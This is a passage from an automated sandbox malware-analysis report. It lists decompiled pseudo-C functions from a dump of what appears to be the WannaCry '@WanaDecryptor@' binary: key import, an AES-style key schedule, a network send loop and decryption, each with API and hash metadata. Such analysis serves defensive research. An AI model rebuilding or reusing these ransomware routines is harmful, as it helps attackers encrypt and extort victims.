                                  					if(_t51 != 0xffffffff) {
                                  						if(_t51 <= 0x19000) {
                                  							_t35 = GlobalAlloc(0, _t51);
                                  							_v36 = _t35;
                                  							if(_t35 == 0) {
                                  								goto L10;
                                  							} else {
                                  								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
                                  									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
                                  									_push(0xffffffff);
                                  									if(_t28 == 0) {
                                  										L11:
                                  										_push( &_v20);
                                  										goto L12;
                                  									} else {
                                  										_push( &_v20);
                                  										L00413056();
                                  										 *[fs:0x0] = _v20;
                                  										return 1;
                                  									}
                                  								} else {
                                  									_push(0xffffffff);
                                  									_push( &_v20);
                                  									goto L12;
                                  								}
                                  							}
                                  						} else {
                                  							_push(0xffffffff);
                                  							_push( &_v20);
                                  							goto L12;
                                  						}
                                  					} else {
                                  						_push(_t24);
                                  						_push( &_v20);
                                  						L12:
                                  						L00413056();
                                  						 *[fs:0x0] = _v20;
                                  						return 0;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                  • _local_unwind2.MSVCRT ref: 00404AC7
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateSize_local_unwind2
                                  • String ID:
                                  • API String ID: 1039228802-0
                                  • Opcode ID: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                  • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                  • Opcode Fuzzy Hash: ed254800d83dd1eb8a6aac6938c1a1a2985862e8f5bcc3d9dd4918768007605e
                                  • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E0040A150(void* __ecx) {
                                  				void* _t170;
                                  				void* _t177;
                                  				unsigned int _t178;
                                  				intOrPtr _t182;
                                  				signed int _t189;
                                  				signed int _t190;
                                  				signed int _t192;
                                  				signed int* _t198;
                                  				signed int* _t203;
                                  				signed int _t214;
                                  				signed int* _t215;
                                  				signed int _t224;
                                  				void* _t236;
                                  				unsigned int _t238;
                                  				signed int _t239;
                                  				signed int _t245;
                                  				signed int _t251;
                                  				void* _t268;
                                  				void* _t275;
                                  				signed int _t276;
                                  				void* _t278;
                                  				signed int _t290;
                                  				int _t292;
                                  				signed int _t293;
                                  				signed int _t317;
                                  				signed int _t321;
                                  				signed int _t337;
                                  				signed int _t353;
                                  				signed int _t355;
                                  				intOrPtr* _t375;
                                  				signed int _t378;
                                  				void* _t385;
                                  				void* _t386;
                                  				void* _t387;
                                  				signed int _t388;
                                  				signed int* _t390;
                                  				void* _t391;
                                  				void* _t392;
                                  				signed int _t395;
                                  				signed int* _t397;
                                  				intOrPtr _t398;
                                  				void* _t399;
                                  				void* _t403;
                                  
                                  				_t236 = __ecx;
                                  				if( *((intOrPtr*)(_t399 + 4)) == 0) {
                                  					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_push(0x41c9c0);
                                  					_push(_t399 + 8);
                                  					L004130FC();
                                  				}
                                  				_t170 =  *(_t399 + 0x20);
                                  				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
                                  					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_t170 = _t399 + 8;
                                  					_push(0x41c9c0);
                                  					_push(_t170);
                                  					L004130FC();
                                  				}
                                  				_t238 =  *(_t399 + 0x24);
                                  				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
                                  					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
                                  					_t238 = _t399 + 0xc;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_push(0x41c9c0);
                                  					_push(_t399 + 8);
                                  					L004130FC();
                                  				}
                                  				 *(_t236 + 0x3c8) = _t170;
                                  				 *(_t236 + 0x3cc) = _t238;
                                  				_t290 = _t238;
                                  				_t385 =  *(_t399 + 0x20);
                                  				_t19 = _t236 + 0x3d0; // 0x424
                                  				_t239 = _t238 >> 2;
                                  				memcpy(_t19, _t385, _t239 << 2);
                                  				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
                                  				_t22 = _t236 + 0x3f0; // 0x444
                                  				_t245 =  *(_t236 + 0x3cc) >> 2;
                                  				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
                                  				_t403 = _t399 + 0x30;
                                  				_t177 =  *(_t236 + 0x3c8);
                                  				if(_t177 == 0x10) {
                                  					_t178 =  *(_t236 + 0x3cc);
                                  					if(_t178 != 0x10) {
                                  						asm("sbb eax, eax");
                                  						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
                                  					} else {
                                  						_t182 = 0xa;
                                  					}
                                  					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
                                  				} else {
                                  					if(_t177 == 0x18) {
                                  						asm("sbb ecx, ecx");
                                  						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
                                  					} else {
                                  						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
                                  					}
                                  				}
                                  				asm("cdq");
                                  				_t292 = 0;
                                  				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
                                  				 *(_t403 + 0x2c) = _t251;
                                  				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                  					L23:
                                  					_t293 = 0;
                                  					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                  						L28:
                                  						_t44 = _t236 + 0x414; // 0x468
                                  						_t387 = _t44;
                                  						asm("cdq");
                                  						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
                                  						 *(_t403 + 0x30) = _t353;
                                  						_t189 =  *(_t403 + 0x24);
                                  						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
                                  						 *(_t403 + 0x10) = _t395;
                                  						if(_t395 <= 0) {
                                  							L31:
                                  							_t388 = 0;
                                  							if(_t395 <= 0) {
                                  								L35:
                                  								if(_t388 >= _t353) {
                                  									L51:
                                  									_t190 = 1;
                                  									 *(_t403 + 0x30) = 1;
                                  									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
                                  										L58:
                                  										 *((char*)(_t236 + 4)) = 1;
                                  										return _t190;
                                  									}
                                  									_t151 = _t236 + 0x208; // 0x25c
                                  									_t397 = _t151;
                                  									do {
                                  										if(_t251 <= 0) {
                                  											goto L57;
                                  										}
                                  										_t390 = _t397;
                                  										_t355 = _t251;
                                  										do {
                                  											_t192 =  *_t390;
                                  											 *(_t403 + 0x24) = _t192;
                                  											_t390 =  &(_t390[1]);
                                  											_t355 = _t355 - 1;
                                  											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
                                  										} while (_t355 != 0);
                                  										_t251 =  *(_t403 + 0x2c);
                                  										L57:
                                  										_t190 =  *(_t403 + 0x30) + 1;
                                  										_t397 =  &(_t397[8]);
                                  										 *(_t403 + 0x30) = _t190;
                                  									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
                                  									goto L58;
                                  								}
                                  								 *(_t403 + 0x28) = 0x41a1b0;
                                  								do {
                                  									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
                                  									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                  									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
                                  									if(_t395 == 8) {
                                  										_t104 = _t236 + 0x418; // 0x46c
                                  										_t198 = _t104;
                                  										_t268 = 3;
                                  										do {
                                  											 *_t198 =  *_t198 ^  *(_t198 - 4);
                                  											_t198 =  &(_t198[1]);
                                  											_t268 = _t268 - 1;
                                  										} while (_t268 != 0);
                                  										 *(_t403 + 0x24) =  *(_t236 + 0x420);
                                  										_t275 = 3;
                                  										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                  										_t116 = _t236 + 0x428; // 0x47c
                                  										_t203 = _t116;
                                  										do {
                                  											 *_t203 =  *_t203 ^  *(_t203 - 4);
                                  											_t203 =  &(_t203[1]);
                                  											_t275 = _t275 - 1;
                                  										} while (_t275 != 0);
                                  										L46:
                                  										 *(_t403 + 0x24) = 0;
                                  										if(_t395 <= 0) {
                                  											goto L50;
                                  										}
                                  										_t119 = _t236 + 0x414; // 0x468
                                  										_t375 = _t119;
                                  										while(1) {
                                  											_t251 =  *(_t403 + 0x2c);
                                  											if(_t388 >=  *(_t403 + 0x30)) {
                                  												goto L51;
                                  											}
                                  											_t398 =  *_t375;
                                  											asm("cdq");
                                  											_t375 = _t375 + 4;
                                  											_t276 = _t388 / _t251;
                                  											asm("cdq");
                                  											_t317 = _t388 %  *(_t403 + 0x2c);
                                  											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
                                  											_t395 =  *(_t403 + 0x10);
                                  											_t214 =  *(_t403 + 0x24) + 1;
                                  											_t388 = _t388 + 1;
                                  											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
                                  											 *(_t403 + 0x24) = _t214;
                                  											if(_t214 < _t395) {
                                  												continue;
                                  											}
                                  											goto L50;
                                  										}
                                  										goto L51;
                                  									}
                                  									if(_t395 <= 1) {
                                  										goto L46;
                                  									}
                                  									_t101 = _t236 + 0x418; // 0x46c
                                  									_t215 = _t101;
                                  									_t278 = _t395 - 1;
                                  									do {
                                  										 *_t215 =  *_t215 ^  *(_t215 - 4);
                                  										_t215 =  &(_t215[1]);
                                  										_t278 = _t278 - 1;
                                  									} while (_t278 != 0);
                                  									goto L46;
                                  									L50:
                                  									_t251 =  *(_t403 + 0x2c);
                                  								} while (_t388 <  *(_t403 + 0x30));
                                  								goto L51;
                                  							}
                                  							_t58 = _t236 + 0x414; // 0x468
                                  							 *(_t403 + 0x24) = _t58;
                                  							while(_t388 < _t353) {
                                  								asm("cdq");
                                  								_t378 = _t388 / _t251;
                                  								asm("cdq");
                                  								_t321 = _t388 % _t251;
                                  								 *(_t403 + 0x28) = _t321;
                                  								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
                                  								_t388 = _t388 + 1;
                                  								_t224 =  *(_t403 + 0x24);
                                  								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
                                  								_t353 =  *(_t403 + 0x30);
                                  								 *(_t403 + 0x24) = _t224 + 4;
                                  								if(_t388 < _t395) {
                                  									continue;
                                  								}
                                  								goto L35;
                                  							}
                                  							goto L51;
                                  						}
                                  						 *(_t403 + 0x24) = _t395;
                                  						do {
                                  							_t387 = _t387 + 4;
                                  							 *(_t387 - 4) = 0 << 0x18;
                                  							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
                                  							_t189 = _t189 + 4;
                                  							_t337 =  *(_t403 + 0x24) - 1;
                                  							 *(_t403 + 0x24) = _t337;
                                  						} while (_t337 != 0);
                                  						goto L31;
                                  					}
                                  					_t38 = _t236 + 0x1e8; // 0x23c
                                  					_t391 = _t38;
                                  					do {
                                  						if(_t251 > 0) {
                                  							memset(_t391, 0, _t251 << 2);
                                  							_t403 = _t403 + 0xc;
                                  							_t251 =  *(_t403 + 0x2c);
                                  						}
                                  						_t293 = _t293 + 1;
                                  						_t391 = _t391 + 0x20;
                                  					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
                                  					goto L28;
                                  				} else {
                                  					_t33 = _t236 + 8; // 0x5c
                                  					_t392 = _t33;
                                  					do {
                                  						if(_t251 > 0) {
                                  							memset(_t392, 0, _t251 << 2);
                                  							_t403 = _t403 + 0xc;
                                  							_t251 =  *(_t403 + 0x2c);
                                  						}
                                  						_t292 = _t292 + 1;
                                  						_t392 = _t392 + 0x20;
                                  					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
                                  					goto L23;
                                  				}
                                  			}


                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                  • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                  • Opcode Fuzzy Hash: 787a0e5b380b31d4d9763920ba09c97f48b514d7692f2e30947326bafaad1703
                                  • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
                                  				void _v1024;
                                  				char _v1028;
                                  				intOrPtr _v1032;
                                  				intOrPtr _v1036;
                                  				void* _v1040;
                                  				intOrPtr _v1044;
                                  				char _v1048;
                                  				signed int _t34;
                                  				void* _t36;
                                  				intOrPtr _t37;
                                  				void* _t43;
                                  				void* _t45;
                                  				intOrPtr _t46;
                                  				void* _t49;
                                  				signed int _t58;
                                  				intOrPtr* _t60;
                                  				signed int _t70;
                                  				signed int _t71;
                                  				signed int _t78;
                                  				void* _t83;
                                  				void* _t91;
                                  				void* _t102;
                                  				void* _t103;
                                  				void* _t104;
                                  				void* _t105;
                                  				void** _t107;
                                  				void** _t109;
                                  
                                  				_t106 =  &_v1040;
                                  				_t105 = _a8;
                                  				_t60 = __ecx;
                                  				_v1032 = 0;
                                  				if(_t105 != 0) {
                                  					_t34 = E0040D5D0(__ecx);
                                  					__eflags = _t34;
                                  					if(_t34 != 0) {
                                  						__eflags = _a12;
                                  						if(_a12 == 0) {
                                  							_t36 = _a4;
                                  							_v1040 = _t36;
                                  							_t91 = _t36;
                                  							goto L13;
                                  						} else {
                                  							__eflags = _a16;
                                  							if(_a16 != 0) {
                                  								__eflags = _t105 - 0x400;
                                  								if(_t105 > 0x400) {
                                  									_t49 = E00412A90(_t105);
                                  									_t109 =  &(( &_v1040)[1]);
                                  									_v1040 = _t49;
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t103 = _a4;
                                  										_t70 = _t105;
                                  										_t71 = _t70 >> 2;
                                  										memcpy(_t49, _t103, _t71 << 2);
                                  										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
                                  										_t106 =  &(_t109[6]);
                                  										_t91 = _v1040;
                                  										E0040D2B0(_t60, _t91, _t105);
                                  										goto L13;
                                  									} else {
                                  										return _t49;
                                  									}
                                  								} else {
                                  									_t104 = _a4;
                                  									_t78 = _t105 >> 2;
                                  									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
                                  									_t106 =  &(( &_v1040)[6]);
                                  									_t83 =  &_v1024;
                                  									_t91 = _t83;
                                  									_v1040 = _t83;
                                  									E0040D2B0(_t60, _t91, _t105);
                                  									goto L13;
                                  								}
                                  							} else {
                                  								_t91 = _a4;
                                  								E0040D2B0(__ecx, _t91, _t105);
                                  								L13:
                                  								_push( &_v1028);
                                  								L0041303E();
                                  								_t37 = _v1028;
                                  								_t107 =  &(_t106[1]);
                                  								_t102 = 0;
                                  								_v1036 = _t37;
                                  								__eflags = _t105;
                                  								if(_t105 > 0) {
                                  									while(1) {
                                  										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
                                  										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
                                  											goto L25;
                                  										}
                                  										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
                                  										__eflags = _t43;
                                  										if(__eflags > 0) {
                                  											_t102 = _t102 + _t43;
                                  											__eflags = _t102;
                                  											_push( &_v1048);
                                  											goto L24;
                                  										} else {
                                  											if(__eflags != 0) {
                                  												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
                                  												__eflags = _t45 - 0x2733;
                                  												if(_t45 == 0x2733) {
                                  													_t46 = _v1044;
                                  													__eflags = _t46 - 0x64;
                                  													_v1044 = _t46 + 1;
                                  													if(_t46 > 0x64) {
                                  														Sleep(0x64);
                                  														_v1044 = 0;
                                  													}
                                  													_push( &_v1048);
                                  													L24:
                                  													L0041303E();
                                  													_t107 =  &(_t107[1]);
                                  													__eflags = _t102 - _t105;
                                  													if(_t102 < _t105) {
                                  														_t37 = _v1048;
                                  														continue;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L25;
                                  									}
                                  								}
                                  								L25:
                                  								__eflags = _t91 - _a4;
                                  								if(_t91 != _a4) {
                                  									__eflags = _t91 -  &_v1024;
                                  									if(_t91 !=  &_v1024) {
                                  										__eflags = _t91;
                                  										if(_t91 != 0) {
                                  											free(_t91);
                                  										}
                                  									}
                                  								}
                                  								return _t102;
                                  							}
                                  						}
                                  					} else {
                                  						_t58 = _t34 | 0xffffffff;
                                  						__eflags = _t58;
                                  						return _t58;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}































                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                  • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00404AF0(void* __ecx, void* _a4, int _a8) {
                                  				intOrPtr* _v4;
                                  				void* _v8;
                                  				signed int _v12;
                                  				int _t12;
                                  				void* _t19;
                                  				signed int _t22;
                                  				signed int _t23;
                                  				struct _CRITICAL_SECTION* _t30;
                                  				void* _t36;
                                  
                                  				_t19 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 8)) != 0) {
                                  					_t2 = _t19 + 0x10; // 0x14
                                  					_t30 = _t2;
                                  					EnterCriticalSection(_t30);
                                  					_t36 = _a4;
                                  					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
                                  					_push(_t30);
                                  					if(_t12 != 0) {
                                  						LeaveCriticalSection();
                                  						_t22 = _v12;
                                  						_t23 = _t22 >> 2;
                                  						memcpy(_v8, _t36, _t23 << 2);
                                  						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
                                  						return 1;
                                  					} else {
                                  						LeaveCriticalSection();
                                  						return 0;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}













                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                  • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CryptDecryptEnterLeave
                                  • String ID:
                                  • API String ID: 1395129968-0
                                  • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                  • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004090F0(intOrPtr* __ecx, void* __fp0) {
                                  				signed int _t226;
                                  				signed int _t230;
                                  				struct tagPOINT _t232;
                                  				long _t233;
                                  				signed int _t237;
                                  				signed int _t242;
                                  				intOrPtr _t246;
                                  				intOrPtr* _t264;
                                  				signed int _t269;
                                  				signed int _t270;
                                  				signed int _t271;
                                  				signed int _t272;
                                  				signed int _t276;
                                  				intOrPtr _t279;
                                  				signed int _t282;
                                  				intOrPtr* _t283;
                                  				struct tagPOINT _t295;
                                  				signed int _t311;
                                  				signed int _t314;
                                  				signed int** _t321;
                                  				intOrPtr _t361;
                                  				intOrPtr _t418;
                                  				intOrPtr* _t429;
                                  				signed int* _t433;
                                  				long _t437;
                                  				signed int _t438;
                                  				intOrPtr* _t440;
                                  				signed int _t441;
                                  				intOrPtr _t442;
                                  				void* _t443;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041414D);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t442;
                                  				_t443 = _t442 - 0xc4;
                                  				_t321 =  *(_t443 + 0xd8);
                                  				_t226 = _t321[1];
                                  				_t429 = __ecx;
                                  				if((_t226 & 0x00000003) == 0) {
                                  					L49:
                                  					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
                                  					return _t226;
                                  				}
                                  				_t433 =  *_t321;
                                  				 *(_t443 + 0x40) = _t226 & 0x00000004;
                                  				 *(_t443 + 0x10) = 0;
                                  				L00412DA6();
                                  				_push(_t443 + 0x14);
                                  				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
                                  				L00412DD6();
                                  				_t230 = _t321[1] & 0x00000300;
                                  				if(_t230 == 0x100) {
                                  					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                  						_push("%d%%");
                                  						L00412DA0();
                                  					}
                                  					_t232 = _t321[7];
                                  					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
                                  					asm("fild dword [esp+0x28]");
                                  					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
                                  					asm("fidiv dword [esp+0x28]");
                                  					L0041304A();
                                  					 *(_t443 + 0x10) = _t232;
                                  				} else {
                                  					if(_t230 == 0x200) {
                                  						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
                                  							_push("%d");
                                  							L00412DA0();
                                  						}
                                  						 *(_t443 + 0x10) = _t321[6];
                                  					}
                                  				}
                                  				_t226 =  *(_t443 + 0x14);
                                  				if( *((intOrPtr*)(_t226 - 8)) == 0) {
                                  					L48:
                                  					 *(_t443 + 0xdc) = 0xffffffff;
                                  					L00412CC2();
                                  					goto L49;
                                  				} else {
                                  					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
                                  					L00412DE2();
                                  					_t437 = _t233;
                                  					 *(_t443 + 0x54) = _t433;
                                  					 *(_t443 + 0x50) = 0x416794;
                                  					 *(_t443 + 0xdc) = 1;
                                  					E00409DF0(_t443 + 0x58);
                                  					 *(_t443 + 0x58) = 0x416780;
                                  					 *((char*)(_t443 + 0xe0)) = 2;
                                  					 *(_t443 + 0x64) = 0;
                                  					 *(_t443 + 0x54) = 0x41677c;
                                  					E00409870(_t443 + 0x54, _t437);
                                  					 *(_t443 + 0x68) = _t433;
                                  					 *((char*)(_t443 + 0xe0)) = 4;
                                  					 *(_t443 + 0x70) = 0xffffffff;
                                  					 *(_t443 + 0x68) = 0x416778;
                                  					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
                                  					 *(_t443 + 0x90) = _t237;
                                  					 *(_t443 + 0x6c) = _t237;
                                  					 *(_t443 + 0x88) = _t433;
                                  					_push(1);
                                  					 *((char*)(_t443 + 0xe0)) = 6;
                                  					 *(_t443 + 0x90) = 0;
                                  					 *(_t443 + 0x88) = 0x416774;
                                  					L00412DC4();
                                  					 *(_t443 + 0x70) = _t237;
                                  					 *(_t443 + 0x8c) = _t237;
                                  					 *(_t443 + 0x7c) = _t433;
                                  					_push(0xe);
                                  					 *((char*)(_t443 + 0xe0)) = 8;
                                  					 *(_t443 + 0x84) = 0xffffffff;
                                  					 *(_t443 + 0x7c) = 0x416770;
                                  					L00413004();
                                  					 *(_t443 + 0x74) = _t237;
                                  					 *(_t443 + 0x80) = _t237;
                                  					 *((char*)(_t443 + 0xe4)) = 9;
                                  					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
                                  					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
                                  					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
                                  					L00412DA6();
                                  					_push( *(_t443 + 0x10));
                                  					_push( *(_t443 + 0x14));
                                  					_push(_t443 + 0x1c);
                                  					 *((char*)(_t443 + 0xe8)) = 0xa;
                                  					L00412E00();
                                  					_t443 = _t443 + 0xc;
                                  					_t242 = 0;
                                  					 *((intOrPtr*)(_t443 + 0x28)) = 0;
                                  					if(_t437 != 0) {
                                  						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
                                  						_t242 = 0;
                                  						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
                                  					}
                                  					 *(_t443 + 0x10) = _t242;
                                  					 *(_t443 + 0x2c) = _t242;
                                  					 *(_t443 + 0x24) = _t242;
                                  					_t438 = 0;
